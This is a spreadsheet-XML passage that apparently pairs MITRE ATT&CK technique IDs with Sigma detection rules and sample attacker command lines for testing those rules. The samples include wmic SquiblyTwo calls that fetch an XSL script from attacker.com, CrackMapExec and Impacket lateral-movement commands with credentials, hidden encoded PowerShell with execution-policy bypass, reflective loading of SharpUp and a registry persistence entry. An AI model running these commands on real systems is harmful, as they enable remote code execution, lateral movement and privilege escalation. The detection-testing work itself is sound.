    <row r="3841" ht="15.75" customHeight="1" s="42">
      <c r="A3841" s="43" t="inlineStr">
        <is>
          <t>t1218.002</t>
        </is>
      </c>
      <c r="B3841" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_control_panel_item</t>
        </is>
      </c>
      <c r="C3841" s="43" t="inlineStr">
        <is>
          <t>Control Panel Items</t>
        </is>
      </c>
      <c r="D3841" s="43" t="inlineStr">
        <is>
          <t>0ba863e6-def5-4e50-9cea-4dd8c7dc46a4</t>
        </is>
      </c>
      <c r="E3841" s="43" t="inlineStr">
        <is>
          <t>reg.exe   add   "HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\CPLs"   /v   "Exploit"   /t   REG_SZ   /d   "test.cpl"</t>
        </is>
      </c>
      <c r="F3841" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3841" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3841" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3841" s="43" t="n"/>
      <c r="J3841" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3841" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3842" ht="15.75" customHeight="1" s="42">
      <c r="A3842" s="43" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B3842" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpup</t>
        </is>
      </c>
      <c r="C3842" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpUp PrivEsc Tool Execution</t>
        </is>
      </c>
      <c r="D3842" s="43" t="inlineStr">
        <is>
          <t>c484e533-ee16-4a93-b6ac-f0ea4868b2f1</t>
        </is>
      </c>
      <c r="E3842" s="43" t="inlineStr">
        <is>
          <t>.\svchost_update.exe --all</t>
        </is>
      </c>
      <c r="F3842" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3842" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3842" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3842" s="43" t="n"/>
      <c r="J3842" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3842" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3843" ht="15.75" customHeight="1" s="42">
      <c r="A3843" s="43" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B3843" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpup</t>
        </is>
      </c>
      <c r="C3843" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpUp PrivEsc Tool Execution</t>
        </is>
      </c>
      <c r="D3843" s="43" t="inlineStr">
        <is>
          <t>c484e533-ee16-4a93-b6ac-f0ea4868b2f1</t>
        </is>
      </c>
      <c r="E3843" s="43" t="inlineStr">
        <is>
          <t>.\svchost_update.exe -c Hijackable"Paths</t>
        </is>
      </c>
      <c r="F3843" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3843" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3843" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3843" s="43" t="n"/>
      <c r="J3843" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3843" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3844" ht="15.75" customHeight="1" s="42">
      <c r="A3844" s="43" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B3844" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpup</t>
        </is>
      </c>
      <c r="C3844" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpUp PrivEsc Tool Execution</t>
        </is>
      </c>
      <c r="D3844" s="43" t="inlineStr">
        <is>
          <t>c484e533-ee16-4a93-b6ac-f0ea4868b2f1</t>
        </is>
      </c>
      <c r="E3844" s="43" t="inlineStr">
        <is>
          <t>[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes('C:\temp\SharpUp.bin')).EntryPoint.Invoke($null, @(,[string[]]@('UnquotedServicePath')))</t>
        </is>
      </c>
      <c r="F3844" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3844" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3844" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3844" s="43" t="n"/>
      <c r="J3844" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3844" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3845" ht="15.75" customHeight="1" s="42">
      <c r="A3845" s="43" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B3845" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_gather_network_info</t>
        </is>
      </c>
      <c r="C3845" s="43" t="inlineStr">
        <is>
          <t>Potential Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D3845" s="43" t="inlineStr">
        <is>
          <t>575dce0c-8139-4e30-9295-1ee75969f7fe</t>
        </is>
      </c>
      <c r="E3845" s="43" t="inlineStr">
        <is>
          <t>wscript.exe "C:\Windows\System32\gatherNetworkInfo.vbs"</t>
        </is>
      </c>
      <c r="F3845" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3845" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3845" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3845" s="43" t="n"/>
      <c r="J3845" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3845" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3846" ht="15.75" customHeight="1" s="42">
      <c r="A3846" s="43" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B3846" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_gather_network_info</t>
        </is>
      </c>
      <c r="C3846" s="43" t="inlineStr">
        <is>
          <t>Potential Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D3846" s="43" t="inlineStr">
        <is>
          <t>575dce0c-8139-4e30-9295-1ee75969f7fe</t>
        </is>
      </c>
      <c r="E3846" s="43" t="inlineStr">
        <is>
          <t>cscript.exe GATHER~1.VBS</t>
        </is>
      </c>
      <c r="F3846" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3846" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3846" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3846" s="43" t="n"/>
      <c r="J3846" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3846" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3847" ht="15.75" customHeight="1" s="42">
      <c r="A3847" s="43" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B3847" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_gather_network_info</t>
        </is>
      </c>
      <c r="C3847" s="43" t="inlineStr">
        <is>
          <t>Potential Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D3847" s="43" t="inlineStr">
        <is>
          <t>575dce0c-8139-4e30-9295-1ee75969f7fe</t>
        </is>
      </c>
      <c r="E3847" s="43" t="inlineStr">
        <is>
          <t>cscript //e:vbs gatherNetworkInfo.vbs</t>
        </is>
      </c>
      <c r="F3847" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3847" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3847" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3847" s="43" t="n"/>
      <c r="J3847" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3847" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3848" ht="15.75" customHeight="1" s="42">
      <c r="A3848" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3848" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C3848" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D3848" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E3848" s="43" t="inlineStr">
        <is>
          <t>update.exe smb 10.0.0.0/24 --username admin --password pass --local-auth --exec-method smbexec -x whoami</t>
        </is>
      </c>
      <c r="F3848" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3848" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3848" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3848" s="43" t="n"/>
      <c r="J3848" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3848" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3849" ht="15.75" customHeight="1" s="42">
      <c r="A3849" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3849" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C3849" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D3849" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E3849" s="43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F3849" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3849" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3849" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3849" s="43" t="n"/>
      <c r="J3849" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3849" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3850" ht="15.75" customHeight="1" s="42">
      <c r="A3850" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3850" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C3850" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D3850" s="43" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E3850" s="43" t="inlineStr">
        <is>
          <t>netexec smb 172.16.10.5 -u 'Administrator' -p 'P@ssword123' --local-auth</t>
        </is>
      </c>
      <c r="F3850" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3850" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3850" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3850" s="43" t="n"/>
      <c r="J3850" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3850" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3851" ht="15.75" customHeight="1" s="42">
      <c r="A3851" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3851" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C3851" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D3851" s="43" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E3851" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cmd.exe" /Q /c hostname 1&gt; \\127.0.0.1\ADMIN$\output.txt 2&gt;&amp;1</t>
        </is>
      </c>
      <c r="F3851" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3851" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3851" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3851" s="43" t="n"/>
      <c r="J3851" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3851" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3852" ht="15.75" customHeight="1" s="42">
      <c r="A3852" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3852" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C3852" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D3852" s="43" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E3852" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C hostname 2&gt;&amp;1 1&gt; \\127.0.0.1\C$\Temp\output.txt</t>
        </is>
      </c>
      <c r="F3852" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3852" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3852" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3852" s="43" t="n"/>
      <c r="J3852" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3852" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3853" ht="15.75" customHeight="1" s="42">
      <c r="A3853" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3853" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C3853" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D3853" s="43" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E3853" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -nop -noni -w 1 -exec bypass -Command "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F3853" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3853" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3853" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3853" s="43" t="n"/>
      <c r="J3853" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3853" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3854" ht="15.75" customHeight="1" s="42">
      <c r="A3854" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3854" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C3854" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D3854" s="43" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E3854" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F3854" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3854" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3854" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3854" s="43" t="n"/>
      <c r="J3854" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3854" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3855" ht="15.75" customHeight="1" s="42">
      <c r="A3855" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3855" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C3855" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D3855" s="43" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E3855" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAIABDAHQAZQB0AGwAZQ==</t>
        </is>
      </c>
      <c r="F3855" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3855" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3855" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3855" s="43" t="n"/>
      <c r="J3855" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3855" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3856" ht="15.75" customHeight="1" s="42">
      <c r="A3856" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3856" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C3856" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D3856" s="43" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E3856" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -EncodedCommand dwBoAG8AYQBtAGkA</t>
        </is>
      </c>
      <c r="F3856" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3856" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3856" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3856" s="43" t="n"/>
      <c r="J3856" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3856" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3857" ht="15.75" customHeight="1" s="42">
      <c r="A3857" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3857" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impacket_lateral_movement</t>
        </is>
      </c>
      <c r="C3857" s="43" t="inlineStr">
        <is>
          <t>HackTool - Potential Impacket Lateral Movement Activity</t>
        </is>
      </c>
      <c r="D3857" s="43" t="inlineStr">
        <is>
          <t>10c14723-61c7-4c75-92ca-9af245723ad2</t>
        </is>
      </c>
      <c r="E3857" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /Q /c cd  1&gt; \\127.0.0.1\ADMIN$\__1567439113.54 2&gt;&amp;1</t>
        </is>
      </c>
      <c r="F3857" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3857" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3857" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3857" s="43" t="n"/>
      <c r="J3857" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3857" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3858" ht="15.75" customHeight="1" s="42">
      <c r="A3858" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3858" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impacket_lateral_movement</t>
        </is>
      </c>
      <c r="C3858" s="43" t="inlineStr">
        <is>
          <t>HackTool - Potential Impacket Lateral Movement Activity</t>
        </is>
      </c>
      <c r="D3858" s="43" t="inlineStr">
        <is>
          <t>10c14723-61c7-4c75-92ca-9af245723ad2</t>
        </is>
      </c>
      <c r="E3858" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\cmd.exe" /Q /c cd  1&gt; \\127.0.0.1\ADMIN$\__1567442499.05 2&gt;&amp;1</t>
        </is>
      </c>
      <c r="F3858" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3858" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3858" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3858" s="43" t="n"/>
      <c r="J3858" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3858" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3859" ht="15.75" customHeight="1" s="42">
      <c r="A3859" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3859" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impacket_lateral_movement</t>
        </is>
      </c>
      <c r="C3859" s="43" t="inlineStr">
        <is>
          <t>HackTool - Potential Impacket Lateral Movement Activity</t>
        </is>
      </c>
      <c r="D3859" s="43" t="inlineStr">
        <is>
          <t>10c14723-61c7-4c75-92ca-9af245723ad2</t>
        </is>
      </c>
      <c r="E3859" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C tasklist /m &gt; C:\Windows\Temp\bAJrYQtL.tmp 2&gt;&amp;1</t>
        </is>
      </c>
      <c r="F3859" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3859" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3859" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3859" s="43" t="n"/>
      <c r="J3859" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3859" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3860" ht="15.75" customHeight="1" s="42">
      <c r="A3860" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3860" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C3860" s="43" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D3860" s="43" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E3860" s="43" t="inlineStr">
        <is>
          <t>wmic path Win32_UserAccount where name='guest' set passwordexpires=false</t>
        </is>
      </c>
      <c r="F3860" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3860" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3860" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3860" s="43" t="n"/>
      <c r="J3860" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3860" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3861" ht="15.75" customHeight="1" s="42">
      <c r="A3861" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3861" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C3861" s="43" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D3861" s="43" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E3861" s="43" t="inlineStr">
        <is>
          <t>wmic.exe os get /format:http://attacker.com/evil.xsl</t>
        </is>
      </c>
      <c r="F3861" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3861" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3861" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3861" s="43" t="n"/>
      <c r="J3861" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3861" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3862" ht="15.75" customHeight="1" s="42">
      <c r="A3862" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3862" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C3862" s="43" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D3862" s="43" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E3862" s="43" t="inlineStr">
        <is>
          <t>wmic.exe  os   get  /format:http://attacker.com/evil.xsl</t>
        </is>
      </c>
      <c r="F3862" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3862" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3862" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3862" s="43" t="n"/>
      <c r="J3862" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3862" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3863" ht="15.75" customHeight="1" s="42">
      <c r="A3863" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3863" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C3863" s="43" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D3863" s="43" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E3863" s="43" t="inlineStr">
        <is>
          <t>wmic os get /format:http://attacker.com/evil.xsl</t>
        </is>
      </c>
      <c r="F3863" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3863" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3863" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3863" s="43" t="n"/>
      <c r="J3863" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3863" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3864" ht="15.75" customHeight="1" s="42">
      <c r="A3864" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3864" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C3864" s="43" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D3864" s="43" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E3864" s="43" t="inlineStr">
        <is>
          <t>wmic.exe -os get /format:http://attacker.com/evil.xsl</t>
        </is>
      </c>
      <c r="F3864" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3864" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3864" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3864" s="43" t="n"/>
      <c r="J3864" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3864" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3865" ht="15.75" customHeight="1" s="42">
      <c r="A3865" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B3865" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C3865" s="43" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D3865" s="43" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E3865" s="43" t="inlineStr">
        <is>
          <t>SharpHound.exe -CollectionMethod All</t>
        </is>
      </c>
      <c r="F3865" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3865" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3865" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3865" s="43" t="n"/>
      <c r="J3865" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3865" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3866" ht="15.75" customHeight="1" s="42">
      <c r="A3866" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B3866" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C3866" s="43" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D3866" s="43" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E3866" s="43" t="inlineStr">
        <is>
          <t>SharpHound.exe --CollectionMethods All</t>
        </is>
      </c>
      <c r="F3866" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3866" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3866" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3866" s="43" t="n"/>
      <c r="J3866" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3866" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3867" ht="15.75" customHeight="1" s="42">
      <c r="A3867" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B3867" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C3867" s="43" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D3867" s="43" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E3867" s="43" t="inlineStr">
        <is>
          <t>SharpHound.exe -CollectionMethod All -OutputDirectory C:\Temp</t>
        </is>
      </c>
      <c r="F3867" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3867" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3867" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3867" s="43" t="n"/>
      <c r="J3867" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3867" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3868" ht="15.75" customHeight="1" s="42">
      <c r="A3868" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B3868" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C3868" s="43" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D3868" s="43" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
